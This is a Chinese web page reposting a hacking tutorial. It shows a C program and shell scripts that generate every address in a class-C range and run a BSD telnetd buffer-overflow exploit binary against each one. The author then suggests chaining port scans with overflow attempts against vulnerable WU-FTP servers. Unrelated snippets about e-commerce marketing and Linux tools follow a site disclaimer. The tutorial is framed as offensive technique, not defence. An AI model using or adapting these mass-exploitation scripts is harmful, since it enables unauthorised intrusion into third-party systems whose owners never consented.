时间:2021-05-23
面我们就以一个简单的扫描一个C类IP里BSDTELNET漏洞机器为例子来看看:$cat num.cmain(){ int x; for (x=0;x<256;x ) printf ("%d\n",x);}上面这段C我想不用我多说了吧,他生成一个C类网的网络号,大家在编译后可以./num >>num.txt来得到这个文本.#!/bin/sh echo -n "please ernter a ip:" read ipip list=`cat num.txt` for listip in $list do echo $ipip.$listipecho >>iplist.txt $ipip.$listip done上面这段我们来说说,read ipip是接受键盘的信息,用来给你输入1.1.1这样一个C段地址以便与下面的LISTIP合并成真正的ip,list='cat num.txt'是读取我们刚才生成的num.txt里1-254的网络号,for listip in $list是把刚才list里的num.txt内容循环读给listip,然后我们用echo $ipip.$listip就可以得到一个真正的ip了,再通过echo >>iplist.txt $ipip.$listip把最后得到的IP写到iplist.txt.通过以上步骤,我们得到了一个c类ip,下面我们就来用我们事先就有的bsdtelnet溢出代码来扫描他们了,如下:#!/bin/sh list=`cat iplist.txt` for listip in $list do ./bsdtelnet -c $listipdonelist='cat iplist.txt'读取刚才我们生成的iplist.txt文本,for listip in $list把list里存放的ip循环送给listip, 看这个./bsdtelnet -c $listip,这个就是调用我们在当前这个SHELL所在的目录执行我们的exploit来对ip进行探测.全部结束,好了,细心的朋友可能发现了,这样的扫描似乎很慢,呵呵,确实,因为这样他不管23端口有没有开,不管对方机器是不是BSD的,他都要去溢出试试,在这里,我只是通过TOMYCHEN兄提供给大家一个巧妙利用SHELL的思路,具体大家可以自己发挥,比如先在SHELL里调用扫描器扫描,然后把开放有21端口的机器保存下面,然后再对开了21端口的机器进行验证看是否可匿名,得到会话返回消息,如果是WU-FTP260等,就可以再调用溢出程序进行测试呀等等.还是那句老话,技术最重要!----------------------------------------------- 作者:SysHunter
声明:本页内容来源网络,仅供用户参考;我单位不保证亦不表示资料全面及准确无误,也不保证亦不表示这些资料为最新信息,如因任何原因,本网内容或者用户因倚赖本网内容造成任何损失或损害,我单位将不会负任何法律责任。如涉及版权问题,请提交至online#300.cn邮箱联系删除。
高度浓缩新版直通车的实战操作精华,内容创新丶提炼精简,系统化总结直通车打爆的七个流程。一丶直通车实战操作3点干货分享技巧一:开车前期加词技巧在刚上车时,添加几个
网络运营中文案的包装十分关键,今天要和大家讲的不是具体创作文案的实战技巧,可是小编觉得这个比实战技巧还关键,因为这个如果都没有掌握的话,后边文案写的再多也打动不
原文大纲:淘宝客如何添加产品到内容库里?普及实战技巧关于提起淘宝客如果要要推广宝贝,是需要把物品计入内容库里去的,不过,新手们也没有操纵过,那么、淘宝客如何添加
之前两篇《Linux常用网络工具:fping主机扫描》和《Linux常用网络工具:hping高级主机扫描》都是关于主机扫描的,本篇介绍Linux下常用的路由扫描
1.前言前面的关于SpringSecurity相关的文章只是一个预热。为了接下来更好的实战,如果你错过了请从SpringSecurity实战系列开始。安全访问的